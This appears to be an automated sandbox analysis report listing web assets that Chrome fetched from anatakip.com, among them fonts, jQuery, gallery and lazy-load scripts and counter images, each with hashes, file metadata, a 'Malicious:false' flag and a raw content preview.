                    SHA-512:2B3FC8BFC31BE5DB14AC1CDA62B0E08DD36CB4B2B9632BB21A65ECA77F7EDAFA9CBFF8519B2AE0CBBB53BA98AD8B8A14AE12296DDC8F9C57C07562BAA48FD05D
                    Malicious:false
                    Reputation:low
                    URL:"https://fonts.googleapis.com/css?family=Roboto:300,400,500,700"
                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2) format('woff2');. unicode-ra
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (3879), with no line terminators
                    Category:downloaded
                    Size (bytes):3879
                    Entropy (8bit):5.083201178012253
                    Encrypted:false
                    SSDEEP:96:JtGAwLAjtHiLmOUOvgoJgkoj819yAjtytj:UtpXvtoOyJ
                    MD5:4EFAE4CC1986329680981C230FD8377A
                    SHA1:E47FBA4102E886F393BF5E672EBFDE01D4C1BFE8
                    SHA-256:6E86593083FACBA2710A2312F26BD7B436D7EF299F99CBC2CCC1B32693EC3144
                    SHA-512:BE13BA06418C252E519C75173D74C7AFC26AD5A2C6FA83267A10AD74E282D60B430AEBA00CE07DE53CF186DBEB0E7A4B3BA63AFBDC175DEA8420CDFC8443F850
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/scripts/fancybox/source/jquery.fancybox.css?v=2.1.5
                    Preview:/*!fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license*/.fancybox-wrap,.fancybox-skin,.fancybox-outer,.fancybox-inner,.fancybox-image,.fancybox-wrap iframe,.fancybox-wrap object,.fancybox-nav,.fancybox-nav span,.fancybox-tmp{padding:0;margin:0;border:0;outline:none;vertical-align:top}.fancybox-wrap{position:absolute;top:0;left:0;z-index:8020}.fancybox-skin{position:relative;background:#f9f9f9;color:#444;text-shadow:none;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px}.fancybox-opened{z-index:8030}.fancybox-opened .fancybox-skin{-webkit-box-shadow:0 10px 25px rgba(0,0,0,.5);-moz-box-shadow:0 10px 25px rgba(0,0,0,.5);box-shadow:0 10px 25px rgba(0,0,0,.5)}.fancybox-outer,.fancybox-inner{position:relative}.fancybox-inner{overflow:hidden}.fancybox-type-iframe .fancybox-inner{-webkit-overflow-scrolling:touch}.fancybox-error{color:#444;font:14px/20px "Helvetica Neue",Helvetica,Arial,sans-serif;margin:0;padding:15px;white-space:nowrap}.fancybox-image,.fancybox-if
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:SVG Scalable Vector Graphics image
                    Category:downloaded
                    Size (bytes):6225
                    Entropy (8bit):5.976934819783072
                    Encrypted:false
                    SSDEEP:96:+R2K3Z4n7tyVwip82hezk6227gLFoXhu1XuE20ot+pVY3YptWDzOzgXK3Zx:ql3KnxyGGMzb7noR20NTww33
                    MD5:2BD5C073A88B83ED74DB88282A56DDFB
                    SHA1:D0EBFC376F8C6A44A8D4CD216817DCD7D0C33650
                    SHA-256:AB5C23A05E39DEED14D9D8262B0DCE9F024F86105A27196CAD37D14A3F516E09
                    SHA-512:5C6C4A92E93FC0F6A675658CC84F6187FDEBD3EEE94EFD07E24658736CBA598F3BC7156B19834B13FB44C1D43FCB7DF9FCCA7F0A453037E30DA76BA8F4B23B89
                    Malicious:false
                    Reputation:low
                    URL:https://fonts.gstatic.com/s/i/productlogos/translate/v14/24px.svg
                    Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><defs><path d="M21.5 5h-9.17L11 1H2.5C1.68 1 1 1.68 1 2.5v15c0 .83.68 1.5 1.5 1.5h9.17L13 23h8.5c.82 0 1.5-.68 1.5-1.5v-15c0-.83-.68-1.5-1.5-1.5z" id="a"/></defs><clipPath id="b"><use overflow="visible" xlink:href="#a"/></clipPath><g clip-path="url(#b)"><image height="31" opacity=".2" overflow="visible" transform="translate(3 1)" width="29" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB0AAAAfCAYAAAAbW8YEAAAACXBIWXMAAAsSAAALEgHS3X78AAAA GXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABQBJREFUeNq8V8tu20YUvXdm+LCk RKiMwI1TFEXhVZJd1gW66xekv9DPqPsvXdU/UaDroJskKy+CInCcGpKtFy2SM/f2DEXZia0odtKW AkFJ8zhzzn3S0Ycvps+79EMDbj3Yfgv4EM+XTN/fEOb3Zg3AXmq7j64D5/e/x/EfzZMnX5jx+LFZ LLyp6yNDOzskYb6RubFdpbdvKUl2Jc+d9PvP5dmzUyH6TVoYXQOq+H5g9vb+cONsO9maLpIyyZPU kZNAppmh9Vpg5kSXwCSVJ5/Vi/r8Tl73y2F9ePidJ3oaga+B4vkUgF+6EW1ndz11gvNdDdL1bDN
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 42 x 16, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):910
                    Entropy (8bit):7.7455040862049085
                    Encrypted:false
                    SSDEEP:24:do/cXeTrHaRodw+UWNhsGzRSIhAugV7unmH4ifkx08v5:K/cXeqadLUWNhNzRSMXgV7unbisx08B
                    MD5:EFA6BB2BFE459BC6F4BDAFA3DB0383F6
                    SHA1:52D15CE52FE50643E542C17812DE43F4ED1B6EE0
                    SHA-256:6318394F737C66F0E2CCFCD88E3935C6667633A1B95FA29FBA2B75431D55EEF2
                    SHA-512:E23C04D8997F5C2F92070E09261B7EE50D9DF8753F45CF66F604F0874FFA8D99E947C97C528EC02A2C3FBE8E43D840B343A7D0225532980D5DA95031216415B7
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...*.........`"....UIDATx..T...=.Mm......&[....Sl..m.m....U....;.uf..frrr...v...U)...).....2Q..`.y.*...U.9..;..0.^........B.......].h.^..... . L3....jQw..vB.D....<..P.4..|.B....d..?.....Qv.....Dv..$...._.|.*.@........k....`..JG...$..T.y|T.......v.iH...yc6'...%..&.w.oI.ZS{..!6A@.Y.....a....U]..:...g-......01F........Q...k#..G\....~.+....z.>....F...}1[..~.9..r[.?..9......2~....e."1.).}[.WW.{.r...|D..<7..t.M.`..S...8.ab..F ....n..S.:n.>1(g.p$.:k1..6...Y..@.5.8.0y.....R...;.K\. 0p...g.,r.E...............=.....!.^..Y!..D.Z.....aV.....;F.4...!.`^.L.VQ.....&...d....O.\...I).!1....{......K.f*.e ....L......~.%IY(..Y.....NeA...?.^..2.C..^........P....)T.&?.zm.Sl.b..l.D...%.{.B>X{.9Y..M..:.)......EK..b.......}....|.o..].....GH?..3F.B(.:.....AdA........Z... .L....)..@?...f.F....6......u..oQfMC.....OC.1[3..j..j.G...&..D`........@>...g....IEND.B`.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Web Open Font Format (Version 2), TrueType, length 15860, version 1.0
                    Category:downloaded
                    Size (bytes):15860
                    Entropy (8bit):7.988022700476719
                    Encrypted:false
                    SSDEEP:384:S7qmPTF4N21t//YW2FS6+1XxrsbGmjlAbvqMmtCN:S621tHY4xwbGmjloSM7N
                    MD5:E9F5AAF547F165386CD313B995DDDD8E
                    SHA1:ACDEF5603C2387B0E5BFFD744B679A24A8BC1968
                    SHA-256:F5AEBDFEA35D1E7656EF4ACC5DB1F243209755AE3300943EF8FC6280F363C860
                    SHA-512:2A71EDB5490F286642A874D52A1969F54282BC43CB24E8D5A297E13B320321FB7B7AF5524EAC609CF5F95EE08D5E4EC5803E2A3C8D13C09F6CC38713C665D0CE
                    Malicious:false
                    Reputation:low
                    URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                    Preview:wOF2......=...........=..........................d.....^.`.. .H..<........8........6.$.... ..~. ..)..~E......6..J..`.. :.....8.;..5......!.l.j.%SX.SDm...RXh...&.X......5..._...............@...8...Gi..g.;9..'.Q......1..5.U.....w.+.hn..........c.....5.#{..%.#.JP*..i.J..U(.6.D5V.<"Ex6"...k..[..{.?.d2....{.........*W.......S...hT,.l..'.9.;[@..._.L..|+...)......S...9F......T..t...-=X.:FtZ..uZ.[.?..f<.....@.....'...I...e..........8.?..-R.3,%X...I2|.Wk{i...V2C....H$.H.LH.{.........(...6U..%W[t.R....j.........iS..%..L....rf.=..7..9i.I...1.Mj..C..u.B.........vJ.....+.u$.=..3..T..R.._.gs...6).$.-.PUH..Hl....WDd.......fK.(B.F1>..5.._[..]}VA#X...c.....%.(s50...m...^...1...'.$U*H.t...H...s.AZu...'...8.p...@.@.....q..Y.#.....#.....G.....G@..o8. A........:.........S.:..N.S.j.....tav.}.9h..s.....he.......{,~k...,eK.z}.......5%G...l.uCK.....V..............m.....U}.Sz..Z.c.{.....:..g......>h..'|Z........a....^.b...o.>...g........f../w'....Ja.o(
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (17430), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):17574
                    Entropy (8bit):5.257239274016406
                    Encrypted:false
                    SSDEEP:384:HjmG4lebSjy1ZQxUQIqmBT6AUVd7N99D0Oy:DmG4leOjy1ZQxUQIqmBT6AQd7N9by
                    MD5:57C8B35D151E69DABFE3E564116849C5
                    SHA1:BAB756FCF4D223475A31E4B0BE21EBB265E90F23
                    SHA-256:8A4F337FF0B6C45CA954D893EA1C0AC405E979389D30769964C05AFC8E8D5150
                    SHA-512:CFDF77EE7D93BFE904477FC6D1F70329456905F824E040DF01DC5B97E811F3FDB863BAB05A47DC5514F6A5BA33F7035BA851713E89B34EF71758B7D24F9A8410
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/lightgallery/dist/js/lightgallery.min.js
                    Preview:/*! lightgallery - v1.2.21 - 2016-06-28..* http://sachinchoolur.github.io/lightGallery/..* Copyright (c) 2016 Sachin N; Licensed Apache 2.0 */..!function(a,b,c,d){"use strict";function e(b,d){if(this.el=b,this.$el=a(b),this.s=a.extend({},f,d),this.s.dynamic&&"undefined"!==this.s.dynamicEl&&this.s.dynamicEl.constructor===Array&&!this.s.dynamicEl.length)throw"When using dynamic mode, you must also define dynamicEl as an Array.";return this.modules={},this.lGalleryOn=!1,this.lgBusy=!1,this.hideBartimeout=!1,this.isTouch="ontouchstart"in c.documentElement,this.s.slideEndAnimatoin&&(this.s.hideControlOnEnd=!1),this.s.dynamic?this.$items=this.s.dynamicEl:"this"===this.s.selector?this.$items=this.$el:""!==this.s.selector?this.s.selectWithin?this.$items=a(this.s.selectWithin).find(this.s.selector):this.$items=this.$el.find(a(this.s.selector)):this.$items=this.$el.children(),this.$slide="",this.$outer="",this.init(),this}var f={mode:"lg-slide",cssEasing:"ease",easing:"linear",speed:600,height:"
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Web Open Font Format (Version 2), TrueType, length 11796, version 1.0
                    Category:downloaded
                    Size (bytes):11796
                    Entropy (8bit):7.979768102624453
                    Encrypted:false
                    SSDEEP:192:WYkvHUbpxo0/ZjZ3j1iq/qSlI+dg5XtlxK0VXWqZLfX4/5HKVEg:+yp+c15qS7qXD3i5HKVl
                    MD5:716871EC15F054EC158445180FE280E1
                    SHA1:D7D746E03E49F7E10CA0B11E598F3D6DB5E34A2B
                    SHA-256:B076E86301CBEE8C5C9AEF51863A9C0A88E6F6D2AABDFFCA93E031113C6CAA74
                    SHA-512:B711105462980ACB531ABEA8D2DA5A5E90A35909EE355933B40449AF87CE890895C2D5125B5A7E81004B50B95CF8F34D3C21AAFF7D43BA0FD890BE7EC99496C0
                    Malicious:false
                    Reputation:low
                    URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fChc4EsA.woff2
                    Preview:wOF2..............q...-..........................@.....0.`....X..<.....D.....z.....6.$..p. ..|. ..:..e...7p.@...F#...........y.r.....8.b.|.S?.q.fR..IEc...8...=tph...G\..+......q.h....d$j."7.]..........B.[...n/O....P.3.m.Or......i&..Ch..N. I.X.#....W..X...!X.}....gk...f^.D..C.x.y51~*'zb..mz,..se.....p{.....u.Q.."+..x..~...y0...T.....&!.,.....-$k..M..[)Tm....N.B.6O...R......p...m.....}."Lk........x..4a....?.h...@.v..H._P.w.|.w|m...?g...7.X.O...=.t.-.'....>!.B..V...]U.Z.....l.!..}DaV...r.Z!......aN.grN.)./&S..$[......~.d..L6.&C...L...2K.L..@,W...T.VH #kT..R.R..l6..j..r+.W..9..KK>..tY......`5..S?.z.~..^...$..4@C.s.?._.V6......W.L..mRJ-.u@.xA.-q..i7.O.....w.kK.._. b.....SuwL..x.|0.C<.........0...N..(X.......1.@....y. @N.)..5..".D....3B.~@.\OJ ..9.@...H.....`e.A...8.-N....K~2%..E_o.S).".....h=./6...j.w.......Z[...[zv..3h'.m&...we..e^.]...?.6.`v.ZSd.5.j.m.~}...'......l.J\..7.(..FPY....j........ZO.A.%v....M.}...\....7...{0.Kv.'.hJz...4d.k6.{.L6}^;..`...@[X|
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1627
                    Entropy (8bit):7.744014189054335
                    Encrypted:false
                    SSDEEP:24:als4mpnjcJAXN9KOBuoovSzIv6IWyWTdEcVSFGqgmwYD6jttTLTk/N:aejc+9vgrvu+6SqYF
                    MD5:B14C0D08CF145C95FD817B8D9185405B
                    SHA1:F6FDA65E743877C776ED034A59646A5B2A7505BF
                    SHA-256:865AE91C010CF38B020C3798CD0DF5B9C5E17C45DF45E22EDE99B44A5EE82581
                    SHA-512:D72DBA0198E3490CAC46B06AF8C65D73BD6AA708F06F78331213363D8E80BA54C2E79592E1524F56EC01D7CCA6DDACAE5ECC77C66334DDFBB09F20E877941387
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/13/1391.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE...........................}}}zzz.............................www.....ttt..........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF......@....tRNS.@..f...0IDATH....S.A...7D..T...r.Q.....{...{....b..* %. I.......b._.^IL...|f...7on2...BH#.U.$.u[..k.G.Q.....==M.......(....c..H."7;.]$.....Z..>o..%...9..~&.\./.7..T...:q.......g..(IFL...x.b>.....e..ys.I......
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (32065), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):85645
                    Entropy (8bit):5.367059669192009
                    Encrypted:false
                    SSDEEP:1536:fYE1JVoiB9JqZdXXe2pD3PgoIiulrUn6Z6a4tfOR7WpfWBZPBJda4w9W3qG9a98B:u4J+rlfOhWpgCW6G9a98Hrt
                    MD5:DAA96F033299D96C239F3020814AE8BA
                    SHA1:F227E7353D26B7E568A8EA31DCA52E496095467C
                    SHA-256:DF74FDFC11FE8A84E461AA514A9684E39E80BB31E2B9CBE40F3202431751D495
                    SHA-512:CBCF1E6B58467CCB48FDCDE907B8B6DDB61CB6BC1AE205B55191BB7F3827D968237E6A6E6936ABCB326F6557B6A4DEE248B8845665402DEF551A96EF5DBE1E09
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/jquery/2.2.4/jquery.min.js?v=1
                    Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.cal
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1398
                    Entropy (8bit):7.683614871341489
                    Encrypted:false
                    SSDEEP:24:PnT2QQnjcJAXN9KOBuoovSzIv6Ii4cXagbib1Rkrg+DL2IUnD5FgmTkMnM8:PT2vjc+9vgrvxcKwkRkrpX21nD5Flnt
                    MD5:0ECE7C5A2926093854DCDA78CD733E2A
                    SHA1:E810A80EB5B1FD33929F644D57DAA7FB0F66A3F2
                    SHA-256:96EDEAA73C4079D0661443F60DF600927167B23B46EC7AA5BE215346850226BB
                    SHA-512:1AF07EC146E786BE6537D57BB6BA3AF0FFB0F8888F1A59D6490AECB9578A425CCB06A89B5147B888D518F854A860DEB703B14A5D510456019F2DCC392B493EAD
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE...rrr...........................ppp...........}}}zzzwww.........ttt............\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...2R......tRNS.@..f....IDATH....S.`....]..V.4PQ.....{...........KFY...V...m.$./.I..$.O4......\..{......d.h.....) ...+=:`...b.0.....2....^.gG#)..2B).8#..gY... .V........D..\s.pd.xw..n.q....8r..K....7..^n.Pd..0*. ..8.[........./pR..`.Z=HT8.u...^...._l...$.D.."+.,.zFG23....a..B5.a$..`Y
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1602
                    Entropy (8bit):7.7376153993316406
                    Encrypted:false
                    SSDEEP:24:t4Pq59mpnjcJAXN9KOBuoovSzIv6IodWxH3Dnv0HgRLmRrlUIe1akhe4ezKNk:tCjc+9vgrv9HzvdUq89Ku
                    MD5:A6E4998ADC6A55CD174CDF065C3B0612
                    SHA1:26566DCF0C11CDD37C2600D56F6C47DA8645B26E
                    SHA-256:AC83CA01D4943F69B3E5080B09B71C926311459A12E5838FE78CA53079BF84EA
                    SHA-512:95881037343C0DEDB1D60465D58544BA9366D9B6BB52EF6C5FDB70189F2A1CBE8C2110C057DDDF2ECEF626664EE0C4B11A6128A55271830B22E70711599EB237
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/14/1431.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE..........www.......ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF....{sU....tRNS.@..f...)IDATH....S.A...U...n.b.E^.bC#..{...{.5b.w..D........b......r!~..f...777...B.fJ....u....!..@.....0....-.c..,..../g..6szj.@._6...'...y..(.b.a.v.@.?.S.O3>...Xj....b...Qv......q..$v..D6.0..lK.%.H.\.5.l.^o.._..^/...{%|C.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Web Open Font Format (Version 2), TrueType, length 11824, version 1.0
                    Category:downloaded
                    Size (bytes):11824
                    Entropy (8bit):7.980191740933112
                    Encrypted:false
                    SSDEEP:192:Hvu1CrjIJmZUR5kDvTAGt8HG9ZaK7A9G8s0G0+U03IZtw27pjsK6JARNp7s2ITmA:P1swCC7t8HG9ZF7AVse3vVjsK6JED42W
                    MD5:DEB26E9B1A25438118E5D39D741AE6B6
                    SHA1:A2801DEFB4C8BED8E4083DFDE0B2A5A9C0537020
                    SHA-256:FC66F942651A9FE1A598770D3D896529DCD7A03D02F40655451513093103E61B
                    SHA-512:1DF39DD92991953AD102EAA9F29846B8E3016B97D0C3F2473E03E9DA7446B326F51C3EC412E98E5133B2E63029D581B86CF8EB0CDDB3B0B891A49DAB41AC95F2
                    Malicious:false
                    Reputation:low
                    URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2
                    Preview:wOF2.......0......q...-..........................@.....0.`....H..<.....,..z..z.....6.$..p. ..~. ..).2e5l.F.....'e..E.q@cC.E.l.......o.T...>....)..:....g.4...j.V.4..l.M.K.*).K5..'.7....'...k..[.....>.QS.....Q.m....8~..k(;ph%.f...~.RP....}..._...N*I..v.>..$...y..V.........%1`#...%k.F.r...2`.6`...c.`$`4..R...#..o.[...e.;s.t..ug!.w..h.*!.O.....uw!,..kS....A.4....Mym........[.w.h...n..Pb]....|I....Y!.\.......J.$..N".TR".....E........>...}M.|..'%c.*....v..o...Yi.{.....X.j..-~S(u.boG..[j..gd....I..@W.Z.Wti......z.*.J."].mf..+*)..V.C..!8.(..<. ...KM.W...h&k{...DW...%....Zm..R.I^E....]../#;..1K..._.R+....b!0.......m..HM!.b)ey|N.~.....,.4l.qeY..%.a....kL..\i......41.G#..e.+Z..H.0.....{.......~#@....... .....b.m.@.....ulZd<.:)4=.h..xtZ...B.i..j.W$..4..u.. J.^h3.2h.T..3...F.q[..2.3.N.;ru.zc?.._~]/|...A$=.S.z.....k?.......g6......>....5..Ki.T....g...t...}.KB....L..w....L..nT..8..t...5.......)o..A.J......Y..d./.i.......7.R....*nX......q.$.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (3309), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):3382
                    Entropy (8bit):5.221912322457205
                    Encrypted:false
                    SSDEEP:96:jVJkXLLcc1JfDvupezu6a6+mD4YP2GOY/Fra:jVSbtJT1MoDV2GOYNra
                    MD5:7E77985180F6AE322E803A2A7B02C25C
                    SHA1:D5E90278D0CBB76BB44048A421A1C23BD7FB1963
                    SHA-256:50AEB5A3215554769F552BAEC5EF7882DFD23344FE25A92105054B8C57F53760
                    SHA-512:073AC51ED0C991BC872A82198504A80A88BE6E6CD0A4762F1447964544D4F3FB3F3E5F5C3AA784BE602F842C941E2216A51B9FE77489A42DD38B02C0A481BF64
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/lazyload/jquery.lazyload.min.js
                    Preview:/*! Lazy Load 1.9.7 - MIT license - Copyright 2010-2015 Mika Tuupola */..!function(a,b,c,d){var e=a(b);a.fn.lazyload=function(f){function g(){var b=0;i.each(function(){var c=a(this);if(!j.skip_invisible||c.is(":visible"))if(a.abovethetop(this,j)||a.leftofbegin(this,j));else if(a.belowthefold(this,j)||a.rightoffold(this,j)){if(++b>j.failure_limit)return!1}else c.trigger("appear"),b=0})}var h,i=this,j={threshold:0,failure_limit:0,event:"scroll",effect:"show",container:b,data_attribute:"original",skip_invisible:!1,appear:null,load:null,placeholder:"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC"};return f&&(d!==f.failurelimit&&(f.failure_limit=f.failurelimit,delete f.failurelimit),d!==f.effectspeed&&(f.effect_speed=f.effectspeed,delete f.effectspeed),a.extend(j,f)),h=j.container===d||j.container===b?e:a(j.container),0===j.event.indexOf("scroll")&&h.bind(j
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (13631), with no line terminators
                    Category:downloaded
                    Size (bytes):13631
                    Entropy (8bit):5.7501395120822805
                    Encrypted:false
                    SSDEEP:192:ZLQunhB6QcxQLDV2H7HHZLQunhB6Qww92lZF3NXe:2cB6nQIH7HWcB692KF3NO
                    MD5:B41E337CF3A026E9B46A0ABCD1FC8728
                    SHA1:ADCD0424A0B910BE18303D26190313338F90DBEE
                    SHA-256:B5EEF2DDCB02B855A1D23A07FF40BA44DB9A3537A72E126F1C2F7ED13D9EE3D6
                    SHA-512:29D71BA5C00F0D671BCDAE9E2BB037109FC612540A33C23CA3A349F77A11B8D2BA435DFE1B46E513005DEB806B78B852C557A2E82F5B95E46A2E8E39B975AB62
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/style/instastyle.css?v=2.4
                    Preview:@-webkit-keyframes spin8{0%{-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg)}100%{-webkit-transform:rotate(540deg);-moz-transform:rotate(540deg);-o-transform:rotate(540deg);transform:rotate(540deg)}}@-moz-keyframes spin8{0%{-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg)}100%{-webkit-transform:rotate(540deg);-moz-transform:rotate(540deg);-o-transform:rotate(540deg);transform:rotate(540deg)}}@-ms-keyframes spin8{0%{-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg)}100%{-webkit-transform:rotate(540deg);-moz-transform:rotate(540deg);-o-transform:rotate(540deg);transform:rotate(540deg)}}@-o-keyframes spin8{0%{-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg)}100%{-webkit-transform:rotate(540deg);-moz-transform:rotate(540deg);-o
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (855)
                    Category:downloaded
                    Size (bytes):534860
                    Entropy (8bit):5.706034030348218
                    Encrypted:false
                    SSDEEP:6144:wwEiDOrwHRo6Zo/S+d6yetdYQ7eTlMXWwcqW61L+KUEIPw6jHS8NR0bXbFujbvjX:w2i6Zo/SQKDWTlMXllIsIPw6jUbyrIi
                    MD5:4668E74B2B2A58381399E91A61B6D63D
                    SHA1:89EBF54E996E46F4B1E26F6DCDA93BAD74FC0A1C
                    SHA-256:B0E3ACC54460721385D2E472DDA7288382F2766A06B38D2E732D034619F9B929
